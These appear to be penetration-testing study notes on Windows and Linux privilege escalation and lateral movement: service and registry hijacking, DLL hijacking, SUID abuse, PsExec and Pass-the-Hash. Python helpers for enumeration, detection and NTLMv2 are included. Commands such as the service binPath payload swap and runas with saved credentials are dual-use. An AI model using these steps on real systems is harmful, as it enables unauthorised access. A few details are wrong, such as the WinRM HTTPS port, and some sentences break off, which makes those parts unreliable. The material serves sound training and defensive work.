Privilege escalation involves exploiting vulnerabilities or misconfigurations to gain
access to resources that are typically restricted to users with higher privileges.

Privilege escalation can be divided into:


1. Vertical → the attacker is able to move from a lower privileged user to a
higher privileged user
2. Horizontal → the attacker keeps the same set or level of privileges, but
assumes the identity of a different user

Privilege escalation with PowerUp

PowerUp is a popular tool used in the context of Windows privilege escalation.
It is part of the PowerSploit framework, a collection of PowerShell-based tools
designed for offensive security tasks.
PowerUp automates the process of scanning a Windows system for potential
misconfigurations, vulnerabilities, and security flaws that could lead to privilege
escalation.
Such as:
• Insecure Service Configuration: Services running with elevated privileges
(e.g., SYSTEM) that are vulnerable to exploitation due to weak permissions or
other security issues
• Unquoted Service Paths: Services with unquoted paths that can be exploited
by placing a malicious executable in a strategic location
• Weak Registry Permissions: Registry keys with insecure permissions that
allow unauthorized modification, leading to privilege escalation
• Vulnerable Scheduled Tasks: Scheduled tasks that can be manipulated to run
with elevated privileges.
• Insecure File Permissions: Files or directories with weak permissions that
could be exploited to execute code with higher privileges.


• Insecure DLL Search Orders: Exploitable DLL search orders that allow DLL
hijacking to gain elevated privileges.
• Stored Credentials: Credentials stored insecurely in registry keys, files, or
other locations.

PowerUp.ps1 (PowerShellMafia/PowerSploit), header of the script:
<#

PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations. See [Link] for more information.

Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

#>

#Requires -Version 2

Load it with `. .\PowerUp.ps1` and run `Invoke-AllChecks` to enumerate the vectors above.

DEMO: (no access)

DEMO: (no access)

Unattended installation file


Windows can automate a variety of repetitive tasks, such as the mass rollout or
installation of Windows on many systems.
This is typically done through the use of the Unattended Windows Setup utility,
which is used to automate the mass installation/deployment of Windows on
systems.
The Unattended Windows Setup utility will typically utilize one of the following
configuration files that contain user account and system configuration
information:
• C:\Windows\Panther\[Link]
• C:\Windows\Panther\[Link]


Windows Credential Manager


Windows Credential Manager is a built-in feature in Microsoft Windows that
allows users to securely store and manage their credentials, such as usernames,
passwords, and other login information, for various services, applications,
websites, and network resources.

💡 cmdkey is a command-line utility in Windows that interacts with
Windows Credential Manager:

- cmdkey /list → list stored credentials
- cmdkey /add:<target> /user:<user> /pass:<password> → add credentials
- cmdkey /delete:<target> → delete credentials

A stored credential for a more privileged account can be used with
runas /savecred /user:<user> <command> to run a program as that user.

DEMO: (no access)

PowerShell History
DEMO: (no access)

Exploiting Insecure Service Permissions


Windows Services are background processes that run in the Windows operating
system, often with elevated privileges.
Services can be configured to start automatically, manually or be triggerd by
specific events.
Insecure service permissions occur when a Windows service has
misconfigurations in its access control settings, allowing unprivileged users to
modify the service or its associated components.
Common permission misconfigurations include:
• Full Control or Write Permissions: If a service's configuration can be
modified by an unprivileged user, this creates a security risk. An attacker could
change the service's properties, such as its executable path, to execute arbitrary
code with elevated privileges.


• Unquoted Service Paths: If a service's executable path contains spaces and is
not properly enclosed in quotes, an attacker can place a malicious executable
in a specific location along the path, causing it to be executed when the
service starts.
Steps:
1. Identify Vulnerable Services
The attacker enumerates the Windows services on the target system to find
those with insecure permissions.
Tools like PowerUp, AccessChk, or Metasploit can be used to automate this
process.
2. Analyze Service Permissions
The attacker checks the permissions on each service to determine if they
allow unauthorized modifications (ACL - Access Control Lists).
3. Modify the Service Configuration
If a service has insecure permissions, the attacker can modify its properties
(e.g. sc config <service> binPath= "C:\path\to\payload.exe").
4. Restart the Service
Once the service configuration has been modified, the attacker restarts the
service (sc stop / sc start), or reboots if the service runs as SYSTEM and
cannot be controlled directly.
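The unquoted-path check is mechanical enough to script. The following is an added example (not from the notes or from PowerUp): given a service's binary path, it lists the files Windows would try to execute before the real one, because CreateProcess treats every space in an unquoted path as a possible end of the program name, and then keeps only the ones whose directory is writable. The service list and the writable directory are constructed; on a real host you would feed it the output of `sc qc` / `wmic service get name,pathname` and the directories `icacls` reports as writable for your user.

```python
import ntpath   # Windows path rules, so the logic runs on any OS


def unquoted_path_candidates(image_path):
    r"""Return the executables Windows would try, in order, before the real one.

    C:\Program Files\Vuln Corp\Service Tool\svc.exe -k run
      -> C:\Program.exe
         C:\Program Files\Vuln.exe
         C:\Program Files\Vuln Corp\Service.exe
    A quoted path, or one without spaces in the executable part, yields []."""
    p = image_path.strip()
    if p.startswith('"'):
        return []                                   # properly quoted: not vulnerable
    end = p.lower().find(".exe")
    exe = p[:end + 4] if end != -1 else p           # drop the argument part
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def writable_hijack_points(image_path, writable_dirs):
    """Keep only the candidates whose directory is on the caller's list of
    user-writable directories (gathered separately, e.g. with icacls/accesschk)."""
    norm = lambda d: d.lower().rstrip("\\")
    writable = {norm(d) for d in writable_dirs}
    return [c for c in unquoted_path_candidates(image_path)
            if norm(ntpath.dirname(c)) in writable]


# Constructed sample, in the shape of `sc qc` BINARY_PATH_NAME values.
SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Program Files\Vuln Corp\Service Tool\svc.exe -k run",
    "SafeSvc": r'"C:\Program Files\Safe Corp\svc.exe" -x',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}
SAMPLE_WRITABLE = [r"C:\Program Files\Vuln Corp"]   # assumed: icacls shows (M) for our user


def find_unquoted_services(services=SAMPLE_SERVICES, writable_dirs=SAMPLE_WRITABLE):
    """{service: [hijack paths the current user can create]} for every service
    whose path is unquoted and contains spaces."""
    return {name: writable_hijack_points(path, writable_dirs)
            for name, path in services.items()
            if unquoted_path_candidates(path)}


if __name__ == "__main__":
    for name, hits in find_unquoted_services().items():
        print(name, "->", hits or "unquoted, but no writable directory on the path")
```

Dropping a payload at the reported path only pays off if the service runs as a more privileged account and can be restarted (or the machine rebooted), which is the "Restart the Service" step above.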

Service Binary Replacement


1. Identify a Service with Insecure Permissions
Attackers first find a service where they have write access to the service's
executable file or its directory.
2. Replace the Executable
The attacker replaces the existing service executable with a malicious
executable. The malicious executable might contain a payload to create
backdoors, escalate privileges, or perform other unauthorized actions.
3. Restart the Service
When the service is restarted, it runs the malicious executable, allowing the
attacker to execute their payload with the privileges of the service, often
resulting in privilege escalation.

DEMO: No access

Privilege Escalation via Registry AutoRuns

Registry Autoruns are a common vector for privilege escalation on Windows systems.
The technique involves exploiting registry keys that are used to configure programs or scripts to run automatically when certain events occur.
Attackers can leverage insecure configurations or weak permissions on these registry keys to execute malicious code with elevated privileges.

💡 Common Autorun scenarios:
• System Startup: Programs configured to start when the system boots.
• User Login: Programs that run when a specific user logs in.
• Service Initialization: Services that start with the system, potentially with elevated privileges.

Steps:
1. Identify Vulnerable Registry Autoruns
The attacker identifies registry keys that control autoruns and checks their
permissions. Tools like AccessChk or PowerUp can help locate insecure keys.
2. Exploiting Weak Permissions
If the attacker has write access to a registry key used for autoruns, they can
modify the key's value to point to a malicious executable or script. This
executable will then run with the permissions of the original autorun process,
often leading to privilege escalation.
3. Achieving Privilege Escalation
When the system restarts or the target user logs in, the malicious code runs
with elevated permissions, granting the attacker higher privileges or allowing
them to perform unauthorized actions.

💡 Typical Registry keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

DEMO: No access

Access Token Impersonation

Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).
A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system.
Access tokens are generated by the [Link] process every time a user authenticates successfully and include the identity and privileges of the user account associated with the thread or process. This token is then attached to the [Link] process, after which all child processes started by the user inherit a copy of the access token from their creator and run under the privileges of that same access token.

💡 Required privileges for a successful impersonation attack

- SeAssignPrimaryToken: Allows a process to assign the primary token for a process. This privilege is critical for creating processes with specific user security contexts.
- SeCreateToken: Allows a process to create new security tokens, typically used for authentication and identity representation.
- SeImpersonatePrivilege: Allows a process to impersonate other users' security tokens. This privilege is crucial for operations where a service or process needs to perform tasks on behalf of a different user.

DEMO: No access

Juicy Potato
Juicy Potato is a Windows privilege escalation exploit that leverages specific vulnerabilities related to DCOM (Distributed Component Object Model).
The exploit leverages Windows' capability to create LocalService/NetworkService tokens and then uses those tokens to impersonate higher-privilege accounts like SYSTEM.

How it works
Juicy Potato exploits a weakness in how DCOM processes and services interact, particularly when creating tokens. It does this by leveraging the LocalService token to get access to a higher-privilege context.
The exploit creates a fake COM server and registers it with a specific CLSID. This allows the attacker to direct requests to their malicious COM server, enabling them to manipulate the token used for that process.
Once the malicious COM server is registered and the process initiated, Juicy Potato can create a LocalService token and then manipulate it to impersonate a high-privilege context like SYSTEM.

Bypassing UAC with UACMe

User Account Control (UAC) is a Windows security feature introduced in Windows Vista that is used to prevent unauthorized changes from being made to the operating system.

UAC is used to ensure that changes to the operating system require approval from the administrator or a user account that is part of the local Administrators group.

🔥 In order to successfully bypass UAC, we will need to have access to a user account that is part of the local Administrators group on the Windows target system.

UACMe is an open source, robust privilege escalation tool that can be used to bypass Windows UAC by leveraging various techniques.
UACME (hfiref0x on GitHub)

DEMO: No access

DLL Hijacking

DLL hijacking is a privilege escalation technique where an attacker manipulates the way Windows applications load Dynamic Link Libraries (DLLs) in order to execute malicious code with elevated privileges.

💡 By manipulating the DLL loading process, an attacker can inject malicious code into an application, potentially leading to privilege escalation.

Methodology
1. Identify Vulnerable Applications
a. Determine Privileged Applications: Identify applications or services that run with elevated privileges.
b. Analyze DLL Dependencies: Examine the application's dependencies on specific DLLs and check for cases where these DLLs may not be found in their expected location.
2. Examine the DLL Search Order
a. Understand the Default Search Order: Windows has a predefined order for searching for DLLs. It generally starts with the application's directory, followed by the system directories, and then other system-defined paths.
b. Identify Potential Insertion Points: Determine where in the search order an attacker might place a DLL so that it gets loaded by the application. Common locations include:
i. The application's current working directory
ii. The System32 or SysWOW64 directories.
iii. Directories listed in the PATH environment variable.
iv. Other directories included in the search order.
3. Inject a Malicious DLL
a. Create a Malicious DLL: The attacker creates a DLL with the same name as a DLL that is missing or not found by the application. This DLL contains the attacker's code or payload.
b. Place the Malicious DLL in a Strategic Location: Place the DLL in a location where the application is likely to look for it (according to the search order). The goal is for the application to find and load the malicious DLL instead of the legitimate one.
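To make the search order in step 2 concrete, here is an added Python model (not from the course) of the standard order Windows uses for a DLL that is not already loaded, is not a Known DLL and is not redirected by a manifest or SetDllDirectory. Paired with a constructed set of user-writable directories, it returns the earliest location from which a planted DLL would be picked up, which is the directory a defender must lock down first. The directory paths, the PATH value and the writable set are all assumptions.

```python
"""Model the standard Windows DLL search order for one application.

Added example (not from the notes). It reproduces the documented default
order used when an application loads a DLL that is not already in memory,
not a Known DLL, and not redirected by a manifest or SetDllDirectory:
application directory, System32, the 16-bit System directory, the Windows
directory, the current directory, then each PATH entry (with
SafeDllSearchMode disabled the current directory moves to second place).
Combined with a list of directories that unprivileged users can write to,
it returns the earliest location where a planted DLL would win. All paths
and the writable set are constructed.
"""
import ntpath
from typing import Optional


def _key(path: str) -> str:
    """Case-insensitive, trailing-separator-insensitive form for comparisons."""
    return ntpath.normcase(path.rstrip("\\"))


def dll_search_order(app_dir: str, windows_dir: str, cwd: str,
                     path_env: str, safe_dll_search_mode: bool = True) -> list:
    """Directories consulted, in order, with duplicates removed.

    Assumes a 64-bit process (a 32-bit process on 64-bit Windows is redirected
    to SysWOW64 instead of System32).
    """
    order = [
        app_dir,
        ntpath.join(windows_dir, "System32"),
        ntpath.join(windows_dir, "System"),
        windows_dir,
    ]
    if safe_dll_search_mode:
        order.append(cwd)
    else:
        order.insert(1, cwd)  # legacy behaviour: CWD searched right after the app directory
    order.extend(p for p in path_env.split(";") if p)

    seen = set()
    unique = []
    for d in order:
        if _key(d) not in seen:
            seen.add(_key(d))
            unique.append(d)
    return unique


def first_writable_hit(order, writable_dirs) -> Optional[str]:
    """Earliest search location an unprivileged user could write a DLL into, or None.

    Only meaningful for a DLL that is not found in an earlier, protected
    directory; the caller should also confirm the legitimate DLL is missing
    from every directory that precedes the returned one.
    """
    writable = {_key(d) for d in writable_dirs}
    for d in order:
        if _key(d) in writable:
            return d
    return None


# Constructed scenario: a privileged app installed under C:\Apps, launched
# from a user's Downloads folder, with a user-writable tools directory on PATH.
APP_DIR = r"C:\Apps\Vuln App"
WINDOWS_DIR = r"C:\Windows"
CWD = r"C:\Users\alice\Downloads"
PATH_ENV = r"C:\Windows\System32;C:\Tools;C:\Python312"
USER_WRITABLE = {r"C:\Tools", r"C:\Users\alice\Downloads"}

if __name__ == "__main__":
    order = dll_search_order(APP_DIR, WINDOWS_DIR, CWD, PATH_ENV)
    print("search order:", order)
    print("first writable location:", first_writable_hit(order, USER_WRITABLE))
```

Note that the model stops at the search order itself; a real assessment also checks which DLL names the application actually requests and fails to find (Process Monitor is the usual tool for that), because a writable directory only matters for a DLL that no earlier, protected directory supplies.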

DEMO: No access

DEMO: No access

Exploiting SUID Binaries

Linux provides specialized permissions that can be used in specific situations (in addition to the classic read, write and execute).
One of these permissions is the SUID permission.

💡 When applied, this permission provides users with the ability to execute a script or binary with the permissions of the file owner, as opposed to the user that is running the script or binary.

SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with "root" permissions.
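An added Python audit (not from the course) that walks a directory tree, lists files carrying the SUID/SGID bit and separates those not on an expected baseline, which is the defender's side of this section. The tree it inspects is constructed in a temporary directory and the baseline names are assumptions. The Linux kernel ignores SUID on interpreted scripts, so in practice only native binaries on the resulting list matter.

```python
"""Find SUID/SGID files under a directory tree and flag unexpected ones.

Added example (not from the notes). It walks a tree with os.lstat, keeps
regular files carrying the setuid or setgid bit, and reports those whose
basename is not in an allowlist of binaries expected to be SUID on the
system. The constructed tree is built in a temporary directory with the
bit set on plain files the current user owns (permitted for any user), so
the audit runs without root.
"""
import os
import shutil
import stat
import tempfile


def find_suid_sgid(root: str) -> list:
    """Return (path, permission bits) for regular files with S_ISUID or S_ISGID set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def unexpected_suid(hits, baseline) -> list:
    """Hits whose file name is not on the expected-SUID baseline."""
    return [(p, m) for p, m in hits if os.path.basename(p) not in baseline]


def basenames(hits) -> list:
    return [os.path.basename(p) for p, _ in hits]


def all_setuid(hits) -> bool:
    """True when every hit carries the setuid bit specifically."""
    return all(m & stat.S_ISUID for _, m in hits)


# Constructed baseline: a few binaries that are legitimately SUID on most distros.
BASELINE = {"passwd", "sudo", "su", "mount", "umount"}


def build_constructed_tree() -> str:
    """Create a throwaway tree: two SUID files (one expected, one not) and one plain file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("backup_helper", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")  # placeholder content, not a real binary
        os.chmod(path, mode)
    return root


def remove_tree(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root = build_constructed_tree()
    try:
        hits = find_suid_sgid(root)
        for path, mode in unexpected_suid(hits, BASELINE):
            print(f"unexpected SUID/SGID: {path} ({oct(mode)})")
    finally:
        remove_tree(root)
```

On a real host the same walk is pointed at `/` (the classic `find / -perm -4000` check does the equivalent), and the interesting output is the difference between two runs or against a known-good baseline, not the list itself.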

Example of SUID permission (figure)

DEMO: No access

DEMO: No access

Shared Library Injection

A shared library is a file that contains code and data that can be loaded by multiple processes at runtime.

💡 Shared library injection involves injecting a custom shared library into a running process to execute arbitrary code or manipulate the process's behavior.

Methodology
1. Identify a Target Process
a. The attacker identifies a running process with elevated privileges, such as a system service, daemon, or application running as root.
2. Create a Malicious Shared Library
a. The attacker creates a shared library containing the code they wish to execute. This code may include an arbitrary payload, a backdoor, etc.
3. Inject the Shared Library into the Target Process
a. Several techniques exist, such as:
Using LD_PRELOAD: This environment variable specifies a shared library to be loaded before any other libraries. By setting this variable, an attacker can preload a malicious shared library into a process.
Process Control (ptrace): The ptrace system call allows a process to control another process, typically used for debugging. Attackers can use ptrace to inject code into a running process, causing it to load a malicious shared library.

DEMO: No access


Lateral Movement & Pivoting

Hint for Lateral Movement and Pivoting

Lateral Movement
It is the process of moving from one compromised system to other systems within a network.

💡 The primary goal of lateral movement is to escalate access and privileges, effectively broadening the attacker's control within the network.

Pivoting
It involves using a compromised system as a "stepping stone" to access other systems or network segments that are otherwise inaccessible from the attacker's initial access point.

Lateral Movement VS Pivoting (figure)


Windows Lateral Movement Techniques

Here is an outline of the various Windows lateral movement techniques:

Credential-Based Lateral Movement

Credential-based lateral movement refers to techniques attackers use to move laterally within a network by obtaining, reusing, or exploiting credentials.

💡 Credentials can be usernames and passwords, hashes or Kerberos tickets.


Technique / Description / Tools

Pass the Hash (PtH): Attackers use stolen NTLM hash values to authenticate with other systems without knowing the plaintext password.
Tools: Mimikatz, Metasploit, Impacket (e.g., [Link]), CrackMapExec.

Pass-the-Ticket (PtT): Attackers use captured Kerberos tickets to authenticate and access resources across a network.
Tools: Mimikatz, Rubeus, Kerberos

Credential Reuse: Attackers use captured plaintext passwords or hashes to gain access to additional systems.
Tools: Mimikatz, Metasploit, CrackMapExec, Impacket

Golden / Silver Tickets: Attackers forge Kerberos tickets to gain long-term or specific access to domain resources.
Tools: Mimikatz, Rubeus

Windows Remote Management Protocols

Remote management protocols allow administrators to manage systems remotely, troubleshoot, and execute scripts.

💡 WinRM, RDP, WMI, SMB


Authenticated Remote Code Execution

Remote execution techniques for lateral movement involve running commands or code on a remote system, allowing attackers to move laterally across a network.

Technique / Description / Tools

Remote Desktop Protocol (RDP): RDP allows a user to remotely connect to a Windows system with a graphical user interface. Attackers can use compromised credentials or brute force to gain access.
Tools: xfreerdp, Metasploit, RDP brute force tools.

Windows Management Instrumentation (WMI): WMI is a framework for managing and monitoring Windows systems. It allows remote execution of commands and scripts.
Tools: PowerShell, Impacket ([Link]), Metasploit modules

PowerShell Remoting: PowerShell provides capabilities for remote administration and scripting. PowerShell remoting allows execution of commands on remote systems.
Tools: PowerShell (Invoke-Command, Enter-PSSession), Metasploit, PowerShell Empire

PsExec and Similar Tools: PsExec and similar tools (like [Link] from Impacket) allow remote execution over SMB by creating a service on the target system to run commands.
Tools: PsExec, Impacket ([Link]), CrackMapExec

Lateral Movement with PsExec

Authenticated Windows lateral movement via SMB with PsExec refers to the process of using valid credentials to move laterally across a Windows network by remotely executing code on other systems via Server Message Block (SMB).

📌 PsExec
It is a utility from the Sysinternals Suite that allows administrators to execute commands on remote systems.

How it works
1. Connection Over SMB
PsExec establishes a connection to a remote system using SMB. It typically requires credentials for authentication, either a plaintext password or NTLM hashes.
2. Named Pipe
PsExec creates a named pipe on the remote system to facilitate communication between the local PsExec client and the remote service.
3. Temporary Service
To execute commands on the remote system, PsExec creates a temporary Windows service. This service runs with elevated privileges, allowing it to execute commands or scripts as Administrator.
4. Execution and Cleanup
Once the command or script has executed, PsExec cleans up by removing the temporary service.
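From the defender's side, step 3 is the most visible part of the sequence: installing the temporary service produces Event ID 7045 ("A service was installed in the system") in the target's System log. The following added Python example (not from the course, and not Sysinternals code) scans constructed 7045 records for that pattern; the record layout, host names, account names, service names and the allowlist are all assumptions.

```python
"""Flag PsExec-style service installs in Service Control Manager events.

Added example (not from the notes). Because PsExec and the tools that
mimic it install a temporary service on the target, the System log on that
host records Event ID 7045 ("A service was installed in the system").
This scanner reads constructed 7045 records, treats the classic PSEXESVC
service name as a high-confidence hit, rates other new services whose
binary sits directly in the Windows directory as medium (a common pattern
for PsExec clones that drop a randomly named executable into ADMIN$), and
queues every other unknown service for review. Records are constructed;
the field layout is not a real Windows export format.
"""
import ntpath
from dataclasses import dataclass

# Constructed records: timestamp | host | event id | service name | image path | account
SAMPLE_EVENTS = """\
2025-04-15T10:01:12Z|WS01|7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe|CORP\\j.doe
2025-04-15T10:05:40Z|WS01|7045|gupdate|"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe" /svc|LocalSystem
2025-04-15T10:07:03Z|WS02|7045|mLHpq|%SystemRoot%\\mLHpq.exe|CORP\\j.doe
2025-04-15T10:09:55Z|WS02|7036|Spooler|-|-
2025-04-15T10:12:30Z|WS03|7045|BackupAgent|"C:\\Program Files\\Acme\\backup.exe"|LocalSystem
"""

KNOWN_SERVICES = {"gupdate"}  # constructed allowlist of services expected to be installed
WINDOWS_ROOTS = {"%systemroot%", r"c:\windows"}


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str
    service: str
    image_path: str
    account: str
    confidence: str  # "high", "medium" or "review"


def parse_events(text: str) -> list:
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, event_id, service, image, account = line.split("|", 5)
        rows.append({"timestamp": ts, "host": host, "event_id": int(event_id),
                     "service": service, "image_path": image, "account": account})
    return rows


def binary_in_windows_root(image_path: str) -> bool:
    """True when the service binary lives directly in %SystemRoot% (no subdirectory)."""
    s = image_path.strip()
    exe = s.split('"')[1] if s.startswith('"') else s.split(" ")[0]
    return ntpath.normcase(ntpath.dirname(exe)) in WINDOWS_ROOTS


def flag_service_installs(text: str, known=KNOWN_SERVICES) -> list:
    findings = []
    known_lower = {k.lower() for k in known}
    for ev in parse_events(text):
        if ev["event_id"] != 7045:
            continue
        name = ev["service"]
        if name.upper() == "PSEXESVC":
            confidence = "high"
        elif name.lower() in known_lower:
            continue
        elif binary_in_windows_root(ev["image_path"]):
            confidence = "medium"
        else:
            confidence = "review"
        findings.append(Finding(ev["timestamp"], ev["host"], name,
                                ev["image_path"], ev["account"], confidence))
    return findings


if __name__ == "__main__":
    for f in flag_service_installs(SAMPLE_EVENTS):
        print(f"[{f.confidence}] {f.host} {f.timestamp} service={f.service} by {f.account}")
```

The account field is worth correlating with the matching 4624 logon on the same host: a service installed by an interactive admin at the console reads very differently from one installed seconds after a network logon from a workstation.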

⚠️ DISCLAIMER
To authenticate via SMB and execute commands with PsExec, the user account must have appropriate permissions.

Administrative Privileges
PsExec typically requires administrative privileges to function properly. This means that the user account used to authenticate over SMB must have the rights to:
• Create and start a service on the remote system.
• Access the IPC$ share, which is used to establish the SMB connection.
• Read and write to certain directories or system areas.
• Local Users and Domain Users: PsExec can use both local and domain-based accounts to authenticate over SMB. In domain environments, users with administrative rights in Active Directory may have broader access to remote systems.

SMB
SMB is a network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network.

📌 SMB uses port 445 (TCP)

Historically, SMB ran on top of NetBIOS using port 139.

The SMB protocol uses two levels of authentication:

1. User Authentication: Users must provide a username and password in order to authenticate with the SMB server and access a share.
2. Share Authentication: Users must provide a password in order to access a restricted share.

NTLM Authentication
NTLM is a legacy authentication protocol.

Although it has been largely replaced by Kerberos in domain-based environments, NTLM is still used in various contexts, especially in environments with older systems or in specific use cases where Kerberos is not feasible.

How it works
NTLM authentication operates using a challenge-response mechanism.
1. Connection Request
A client, such as a Windows system or an application, initiates a connection to an SMB server.
2. Server Challenge
The SMB server responds with an NTLM challenge. This challenge is a random value used to ensure that the authentication process involves a unique component for each session.
3. Client Response
The client calculates a response to the server's challenge. This calculation involves encrypting the challenge using the NTLM hash derived from the user's password.
This process proves that the client has access to the correct NTLM hash without transmitting the plaintext password.

📌 Two types of NTLM
• NTLMv1: Uses a DES-based mechanism to generate the response. It has been deprecated due to security weaknesses.
• NTLMv2: More secure, involving a combination of the server's challenge and a client challenge (a unique value generated by the client), providing additional security against replay attacks.

4. Server Verification
The server verifies the client's response by comparing it to the expected response, derived from its stored NTLM hashes.

SMB Authentication via PsExec

In order to utilize PsExec to gain access to a Windows target, we will need to identify legitimate user accounts and their respective passwords or password hashes.
Tool used: Impacket
[Link] in Impacket
This script in Impacket mimics the functionality of PsExec, allowing remote execution of commands on Windows systems.
• SMB Connection: [Link] establishes a connection to the remote system using SMB. It uses valid credentials (plaintext or hashed) to authenticate.
• Creating a Named Pipe: Once connected, the script creates a named pipe to communicate with the remote system.
• Installing a Service: It installs a temporary service on the remote system to execute the desired command.
• Executing Commands: The service executes the provided command or script, returning the output via the named pipe.
• Cleaning Up: After

Methodology
1. Obtain Credentials
Attackers acquire valid credentials through methods like credential dumping, phishing, or other means. These credentials may be plaintext passwords or NTLM hashes.
2. Establish SMB Connection
Using PsExec, the attacker establishes a connection to the target system over SMB. This typically involves providing a username and password, or an NTLM hash.
3. Remote Command Execution
PsExec creates a named pipe on the target system to communicate with the PsExec client.

DEMO: No access

Lateral Movement With SMBExec

SMBExec is a tool used for remote command execution on Windows systems over the SMB protocol.
It is designed to allow administrators (or attackers) to execute commands on remote Windows machines, typically with administrative privileges.

📌 Does not create a Temporary Service

Unlike PsExec, which creates a temporary Windows service to execute commands, SMBExec operates differently, often using Windows Management Instrumentation (WMI) or similar methods to achieve remote execution without creating additional services.

DEMO: No access

Lateral Movement With CrackMapExec

CrackMapExec (CME) is a powerful open-source penetration testing tool designed for ethical hackers.

💡 Used to enumerate and assess networks; it has extensive capabilities for network reconnaissance, lateral movement, and remote exploitation.

Use Cases:
• Network Enumeration and Reconnaissance: CME can scan networks to
identify hosts, enumerate shares, and gather other valuable information.
• Credential Testing and Brute Forcing: CME can test credentials against
network resources, checking for weak or reused passwords. This can
help penetration testers identify potential vulnerabilities.
• Lateral Movement: Using various techniques, CME can move laterally
across a network, exploiting valid credentials, hashes, or Kerberos
tickets.
• Privilege Escalation: CME can attempt to escalate privileges on remote
systems, providing deeper access to resources
• Remote Command Execution: CME can execute commands on remote
systems over SMB, WMI, or other protocols, allowing for flexible remote
management.

DEMO: No access

Lateral Movement via RDP

DEMO: No access

Lateral Movement via WinRM

Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access to Windows systems over HTTP/HTTPS.

💡 Works on port TCP 5985 and HTTPS 598

WinRM is used for:
○ Remotely accessing and interacting with Windows hosts on a local network.
○ Remotely accessing and executing commands on Windows systems.
○ Managing and configuring Windows systems remotely.

WinRM authentication involves verifying the identity of a client attempting to connect to a WinRM service on a Windows system.

Privileges
To access Windows Remote Management (WinRM), a user account requires certain privileges and permissions. The specific privileges depend on what operations the user is expected to perform with WinRM and whether the environment is configured to restrict access to certain groups or users.
By default, WinRM is configured to allow access to users who belong to the local Administrators group.

💡 Tools
• Evil-WinRM: tool designed for interacting with the WinRM service on remote Windows systems. Used to execute commands, transfer files, and gather information.
• CrackMapExec: can execute PowerShell commands or scripts on remote systems via WinRM.
• PowerShell Remoting: allows you to run PowerShell commands or scripts on remote computers.

Penetration test / Administrative task
Penetration test: Evil-WinRM, CrackMapExec
Administrative task: PowerShell Remoting

DEMO: No access

Pass-the-Hash (PtH)
Pass-the-Hash is a technique used in lateral movement attacks where an attacker uses a hashed version of a password to authenticate without needing the plaintext password.
Pass-the-Hash allows attackers to impersonate users, gain unauthorized access, and move laterally across a network.

How it works
Step / Description / Tools

Obtaining Hashes: Attackers acquire NTLM hashes through
Tools: Mimikatz, Hashcat, Metasploit

Using NTLM hashes for authentication: Once the attacker has an NTLM hash, they can use it to authenticate without needing the plaintext password.

Connecting to Remote Systems: Attackers can use the NTLM hash to establish connections with remote systems. Common methods include using SMB, RDP, WMI.
Tools: CrackMapExec, PsExec, Impacket

Lateral Movement: Using Pass-the-Hash, attackers can move laterally across a network, connecting to other systems and performing various tasks, such as remote command execution, data exfiltration, or privilege escalation.
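Steps 3 and 4 of the NTLM Authentication section and the table above turn on one fact: the response is computed from the NT hash, never from the password, so whoever holds the hash can answer the challenge. The added Python block below (not from the course) works through the NTLMv2 form of that computation using only hashlib and hmac, from both the client's and the server's side; the NT hash, challenges, user name and domain are constructed values.

```python
"""NTLMv2 challenge/response computed from the stored NT hash.

Added example (not from the notes). It follows the NTLMv2 computation in
MS-NLMP using only hmac/hashlib:
    NTOWFv2    = HMAC-MD5(NT_hash, UTF-16LE(UPPER(user) + domain))
    NTProofStr = HMAC-MD5(NTOWFv2, server_challenge + blob)
where the blob carries a timestamp, the client challenge and target info,
and the client sends NTProofStr || blob. The server repeats the same
computation from the NT hash it stores and compares. The NT hash here is a
constructed 16-byte value standing in for MD4(UTF-16LE(password)); the
code never needs the password, which is exactly what makes Pass-the-Hash
possible.
"""
import hashlib
import hmac
import os
import struct


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 over the upper-cased user name and the domain, keyed by the NT hash."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_blob(client_challenge: bytes, timestamp: int, target_info: bytes = b"") -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: version bytes, reserved, FILETIME, client nonce, reserved, AV pairs, terminator."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def new_client_challenge() -> bytes:
    """Fresh 8-byte client nonce; the sample exchange below uses a fixed one instead."""
    return os.urandom(8)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """What the client puts in NtChallengeResponse: NTProofStr followed by the blob."""
    nt_proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


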